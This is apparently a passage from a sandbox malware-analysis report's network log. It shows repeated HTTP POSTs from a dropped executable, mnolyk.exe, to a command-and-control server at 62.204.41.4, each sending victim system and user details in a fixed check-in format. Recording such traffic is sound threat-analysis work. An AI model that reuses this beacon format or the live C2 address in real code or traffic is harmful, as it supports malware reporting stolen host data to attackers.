                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        229 | 192.168.2.5 | 49919 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:49.446973085 CET | 430 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:49.513588905 CET | 430 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        23 | 192.168.2.5 | 49713 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:34.634243011 CET | 223 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:34.698781967 CET | 224 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        230 | 192.168.2.5 | 49920 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:49.692974091 CET | 431 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:49.757086039 CET | 431 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        231 | 192.168.2.5 | 49921 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:49.926933050 CET | 432 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:49.994590998 CET | 432 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        232 | 192.168.2.5 | 49922 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:50.176453114 CET | 433 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:50.242876053 CET | 433 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        233 | 192.168.2.5 | 49923 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:50.412938118 CET | 434 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:50.478907108 CET | 434 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        234 | 192.168.2.5 | 49924 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:50.645406008 CET | 435 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:50.711787939 CET | 435 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        235 | 192.168.2.5 | 49925 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:50.890187025 CET | 436 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:50.955138922 CET | 436 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        236 | 192.168.2.5 | 49926 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:51.137579918 CET | 437 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:51.206058979 CET | 437 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        237 | 192.168.2.5 | 49927 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:51.554248095 CET | 438 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:51.619070053 CET | 438 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        238 | 192.168.2.5 | 49928 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:51.819639921 CET | 439 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:51.883795023 CET | 439 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        239 | 192.168.2.5 | 49929 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:52.146320105 CET | 440 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:52.217864037 CET | 440 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        24 | 192.168.2.5 | 49714 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:34.963073015 CET | 224 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:35.026926041 CET | 225 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        240 | 192.168.2.5 | 49930 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:53.103784084 CET | 441 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:53.168404102 CET | 441 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        241 | 192.168.2.5 | 49931 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:53.428937912 CET | 442 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:53.494733095 CET | 442 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        242 | 192.168.2.5 | 49932 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:53.704513073 CET | 443 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:53.767765999 CET | 443 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        243 | 192.168.2.5 | 49933 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:54.746192932 CET | 444 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:54.813713074 CET | 444 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        244 | 192.168.2.5 | 49934 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:55.067276001 CET | 445 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:55.136074066 CET | 445 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        245 | 192.168.2.5 | 49935 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:55.397933006 CET | 446 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:55.461610079 CET | 446 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        246 | 192.168.2.5 | 49936 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
